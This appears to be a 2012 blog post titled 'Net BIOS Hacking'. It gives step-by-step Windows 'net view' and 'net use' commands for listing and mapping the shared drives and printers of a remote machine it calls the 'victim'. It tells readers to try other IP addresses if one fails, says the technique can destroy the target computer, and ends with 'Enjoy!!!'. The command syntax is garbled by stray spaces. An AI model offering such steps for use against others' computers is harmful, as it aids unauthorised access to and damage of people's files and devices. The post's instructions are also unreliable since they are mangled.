Total Pageviews

Popular Posts

Saturday, February 4, 2012

Net BIOS Hacking

NetBIOS hacking is a remote computer hacking techniques to see hard-disk/printer
can also be used for the destruction of the computer.

The following steps:

1. Open CMD (start-> run-> type cmd)

2. Type in NetView
(or can use the command on the tools NBscanner)

3. Examples like this C: \> net view \ \ 219.64.55.112

219.64.55.112 is the ip of victim, if successful, a list of hard-disk and printer appears, if it fails there will be an error message, try step 2 with a different ip.

4. If successfully use the command / type "net use". Net use command to control a computer is the owner of the ip.

5. This is an example

C: \> net use D: \ \ 219.64.55.112 \ F
Example-2:
C: \> net use G: \ \ 219.64.55.112 \ SharedDocs
Example-3:
C: \> net use I: \ \ 219.64.55.112 \ Myprint

example 1.2 and 3, D:, G: & I: is the drive to be in control.

note ::: :::
drive D, G, I is the name of the victim drive, usually drive on the named C:, D: ....

6. If the command is successful, the computer will have the words "The command completed successfully"


Enjoy!!!

2 comments: